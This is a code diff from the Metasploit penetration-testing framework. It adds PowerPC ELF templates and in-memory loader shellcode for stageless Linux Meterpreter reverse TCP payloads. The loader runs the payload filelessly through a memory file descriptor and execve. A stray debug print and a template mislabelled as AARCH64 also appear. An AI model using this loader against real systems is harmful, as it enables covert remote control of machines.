rapid7
diff --git a/‎data/templates/src/elf/exe/elf_ppc64le_template.s‎
Lines changed: 11 additions & 11 deletions b/‎data/templates/src/elf/exe/elf_ppc64le_template.s‎
Lines changed: 11 additions & 11 deletions
diff --git a/‎data/templates/src/elf/exe/elf_ppc_template.s‎
Lines changed: 35 additions & 0 deletions b/‎data/templates/src/elf/exe/elf_ppc_template.s‎
Lines changed: 35 additions & 0 deletions
diff --git a/‎data/templates/src/elf/exe/template_ppc64le_linux.bin‎
-84 Bytes b/‎data/templates/src/elf/exe/template_ppc64le_linux.bin‎
-84 Bytes
diff --git a/‎data/templates/src/elf/exe/template_ppc_linux.bin‎
-88 Bytes b/‎data/templates/src/elf/exe/template_ppc_linux.bin‎
-88 Bytes
diff --git a/‎data/templates/template_ppc64le_linux.bin‎
128 Bytes b/‎data/templates/template_ppc64le_linux.bin‎
128 Bytes
diff --git a/‎data/templates/template_ppc_linux.bin‎
84 Bytes b/‎data/templates/template_ppc_linux.bin‎
84 Bytes
diff --git a/‎lib/msf/util/exe.rb‎
Lines changed: 27 additions & 1 deletion b/‎lib/msf/util/exe.rb‎
Lines changed: 27 additions & 1 deletion
diff --git a/‎modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb‎
Lines changed: 17 additions & 11 deletions b/‎modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb‎
Lines changed: 17 additions & 11 deletions
diff --git a/‎modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb‎
Lines changed: 46 additions & 12 deletions b/‎modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb‎
Lines changed: 46 additions & 12 deletions
@@ -10,9 +10,9 @@ ehdr:                            ; Elf32_Ehdr
   dw    2                        ;   e_type       = ET_EXEC for an executable
   dw    0x15                     ;   e_machine    = PowerPC
   dd    0                        ;   e_version
-  dd    _start                   ;   e_entry
-  dd    phdr - $$                ;   e_phoff
-  dd    0                        ;   e_shoff
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    0                        ;   e_shoff
   dd    0                        ;   e_flags
   dw    ehdrsize                 ;   e_ehsize
   dw    phdrsize                 ;   e_phentsize
@@ -26,14 +26,14 @@ ehdrsize equ  $ - ehdr
 phdr:                            ; Elf32_Phdr
   dd    1                        ;   p_type       = PT_LOAD
   dd    7                        ;   p_flags      = rwx
-  dd    0                        ;   p_offset
-  dd    $$                       ;   p_vaddr
-  dd    $$                       ;   p_paddr
-  dd    0xDEADBEEF               ;   p_filesz
-  dd    0xDEADBEEF               ;   p_memsz
-  dd    0x1000                   ;   p_align
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0xDEADBEEF               ;   p_filesz
+  dq    0xDEADBEEF               ;   p_memsz
+  dq    0x1000                   ;   p_align
 
 phdrsize equ  $ - phdr
-global _start
-_start:
 
+_start:
+dq _start+0x8
@@ -0,0 +1,35 @@
+BITS 32
+org     0x8000
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 1, 2, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    0x0200                   ;   e_type       = ET_EXEC for an executable
+  dw    0x1400                   ;   e_machine    = AARCH64
+  dd    0x10000000                        ;   e_version
+  dd    0x00008054      ;   e_entry
+  dd    0x34000000       ;   e_phoff
+  dd    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    0x3400                   ;   e_ehsize
+  dw    0x2000                   ;   e_phentsize
+  dw    0x0100                   ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    0x01000000               ;   p_type       = PT_LOAD
+  dd    0                        ;   p_offset
+  dd    0x00800000       ;   p_vaddr
+  dd    0x00800000                       ;   p_paddr
+  dd    0xdeadbeef       ;   p_filesz
+  dd    0xdeadbeef       ;   p_memsz
+  dd    0x07000000               ;   p_flags      = rwx
+  dd    0x00010000       ;   p_align
+
+phdrsize equ  $ - phdr
+
+_start:
+
@@ -1232,7 +1232,28 @@ def self.to_linux_aarch64_elf(framework, code, opts = {})
     to_exe_elf(framework, opts, "template_aarch64_linux.bin", code)
   end
 
-  # self.to_linux_mipsle_elf
+  # self.to_linux_ppc64le_elf
+  #
+  # @param framework [Msf::Framework]
+  # @param code       [String]
+  # @param opts       [Hash]
+  # @option           [String] :template
+  # @return           [String] Returns an elf
+  def self.to_linux_ppc64le_elf(framework, code, opts = {})
+    to_exe_elf(framework, opts, "template_ppc64le_linux.bin", code)
+  end
+  
+  # self.to_linux_ppc_elf
+  #
+  # @param framework [Msf::Framework]
+  # @param code       [String]
+  # @param opts       [Hash]
+  # @option           [String] :template
+  # @return           [String] Returns an elf
+  def self.to_linux_ppc_elf(framework, code, opts = {})
+    to_exe_elf(framework, opts, "template_ppc_linux.bin", code)
+  end
+   # self.to_linux_mipsle_elf
   # Little Endian
   # @param framework [Msf::Framework]
   # @param code       [String]
@@ -2170,6 +2191,7 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
       if elf? code
         return code
       end
+      puts arch
       if !plat || plat.index(Msf::Module::Platform::Linux)
         case arch
         when ARCH_X86,nil
@@ -2188,6 +2210,10 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
           to_linux_riscv32le_elf(framework, code, exeopts)
         when ARCH_RISCV64LE
           to_linux_riscv64le_elf(framework, code, exeopts)
+        when ARCH_PPC64LE
+	  to_linux_ppc64le_elf(framework, code, exeopts)
+        when ARCH_PPC
+	  to_linux_ppc_elf(framework, code, exeopts)
         end
       elsif plat && plat.index(Msf::Module::Platform::BSD)
         case arch
 
@@ -3,10 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 # Module generated by tools/modules/generate_mettle_payloads.rb
 module MetasploitModule
-
   CachedSize = 1213932
 
   include Msf::Payload::Single
@@ -17,18 +15,18 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name'          => 'Linux Meterpreter, Reverse TCP Inline',
-        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
-        'Author'        => [
+        'Name' => 'Linux Meterpreter, Reverse TCP Inline',
+        'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author' => [
           'Adam Cammack <adam_cammack[at]rapid7.com>',
           'Brent Cook <brent_cook[at]rapid7.com>',
           'timwr'
         ],
-        'Platform'      => 'linux',
-        'Arch'          => ARCH_PPC,
-        'License'       => MSF_LICENSE,
-        'Handler'       => Msf::Handler::ReverseTcp,
-        'Session'       => Msf::Sessions::Meterpreter_ppc_Linux
+        'Platform' => 'linux',
+        'Arch' => ARCH_PPC,
+        'License' => MSF_LICENSE,
+        'Handler' => Msf::Handler::ReverseTcp,
+        'Session' => Msf::Sessions::Meterpreter_ppc_Linux
       )
     )
   end
@@ -38,6 +36,14 @@ def generate(_opts = {})
       scheme: 'tcp',
       stageless: true
     }.merge(mettle_logging_config)
-    MetasploitPayloads::Mettle.new('powerpc-linux-muslsf', generate_config(opts)).to_binary :exec
+    in_memory_loader = [
+      0x7c832b78, # 0x1000:	or	r3, r4, r5	0x7c832b78
+      0x7c832b78, # 0x1004:	or	r3, r4, r5	0x7c832b78
+      0x7c832b78, # 0x1008:	or	r3, r4, r5	0x7c832b78
+      0x48000004, # 0x100c:	b	0x1010	0x48000004
+      0x7de802a6, # 0x1010:	mflr	r15	0x7de802a6
+    ].pack('V*')
+    payload = MetasploitPayloads::Mettle.new('powerpc-linux-muslsf', generate_config(opts)).to_binary :exec
+    in_memory_loader + payload
   end
 end
@@ -3,10 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 # Module generated by tools/modules/generate_mettle_payloads.rb
 module MetasploitModule
-
   CachedSize = 1238560
 
   include Msf::Payload::Single
@@ -17,18 +15,18 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name'          => 'Linux Meterpreter, Reverse TCP Inline',
-        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
-        'Author'        => [
+        'Name' => 'Linux Meterpreter, Reverse TCP Inline',
+        'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author' => [
           'Adam Cammack <adam_cammack[at]rapid7.com>',
           'Brent Cook <brent_cook[at]rapid7.com>',
           'timwr'
         ],
-        'Platform'      => 'linux',
-        'Arch'          => ARCH_PPC64LE,
-        'License'       => MSF_LICENSE,
-        'Handler'       => Msf::Handler::ReverseTcp,
-        'Session'       => Msf::Sessions::Meterpreter_ppc64le_Linux
+        'Platform' => 'linux',
+        'Arch' => ARCH_PPC64LE,
+        'License' => MSF_LICENSE,
+        'Handler' => Msf::Handler::ReverseTcp,
+        'Session' => Msf::Sessions::Meterpreter_ppc64le_Linux
       )
     )
   end
@@ -39,7 +37,43 @@ def generate(_opts = {})
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('powerpc64le-linux-musl', generate_config(opts)).to_binary :exec
-    in_memory_loader_asm = [0x1422667c].pack("V*")
-    in_memory_loader_asm + payload
+    in_memory_loader_asm = [
+      0x4800007c, # 0x1000:	b	0x107c	0x4800007c
+      0x7de802a6, # 0x1004:	mflr	r15	0x7de802a6
+      0x39c00000, # 0x1008:	li	r14, 0	0x39c00000
+      0x95c10000, # 0x100c:	stwu	r14, 0(r1)	0x95c10000
+      0x7c230b78, # 0x1010:	mr	r3, r1	0x7c230b78
+      0x38800000, # 0x1014:	li	r4, 0	0x38800000
+      0x38000168, # 0x1018:	li	r0, 0x168	0x38000168
+      0x44000002, # 0x101c:	sc		0x44000002
+      0x7df07b78, # 0x1020:	mr	r16, r15	0x7df07b78
+      0x7c711b78, # 0x1024:	mr	r17, r3	0x7c711b78
+      0x80af0000, # 0x1028:	lwz	r5, 0(r15)	0x80af0000
+      0x39ef0022, # 0x102c:	addi	r15, r15, 0x22	0x39ef0022
+      0x7de47b78, # 0x1030:	mr	r4, r15	0x7de47b78
+      0x38000004, # 0x1034:	li	r0, 4	0x38000004
+      0x44000002, # 0x1038:	sc		0x44000002
+      0x3a100020, # 0x103c:	addi	r16, r16, 0x20	0x3a100020
+      0x3a40000a, # 0x1040:	li	r18, 0xa	0x3a40000a
+      0x7e7193d6, # 0x1044:	divw	r19, r17, r18	0x7e7193d6
+      0x7e9391d6, # 0x1048:	mullw	r20, r19, r18	0x7e9391d6
+      0x7eb48850, # 0x104c:	subf	r21, r20, r17	0x7eb48850
+      0x3ab50030, # 0x1050:	addi	r21, r21, 0x30	0x3ab50030
+      0x7e719b78, # 0x1054:	mr	r17, r19	0x7e719b78
+      0x96b0ffff, # 0x1058:	stwu	r21, -1(r16)	0x96b0ffff
+      0x2c110000, # 0x105c:	cmpwi	r17, 0	0x2c110000
+      0x4082ffe4, # 0x1060:	bne	0x1044	0x4082ffe4
+      0x39efffe2, # 0x1064:	addi	r15, r15, -0x1e	0x39efffe2
+      0x7de37b78, # 0x1068:	mr	r3, r15	0x7de37b78
+      0x7ca52a78, # 0x106c:	xor	r5, r5, r5	0x7ca52a78
+      0x7c842278, # 0x1070:	xor	r4, r4, r4	0x7c842278
+      0x3800000b, # 0x1074:	li	r0, 0xb	0x3800000b
+      0x44000002, # 0x1078:	sc		0x44000002
+      0x4bffff89, # 0x107c:	bl	0x1004	0x4bffff89
+
+      payload.length
+    ].pack('V*')
+    fd_path = '/proc/self/fd/'.bytes.pack('C*') + "\x2f" * 14 + "\x00" * 2
+    in_memory_loader_asm + fd_path + payload
   end
 end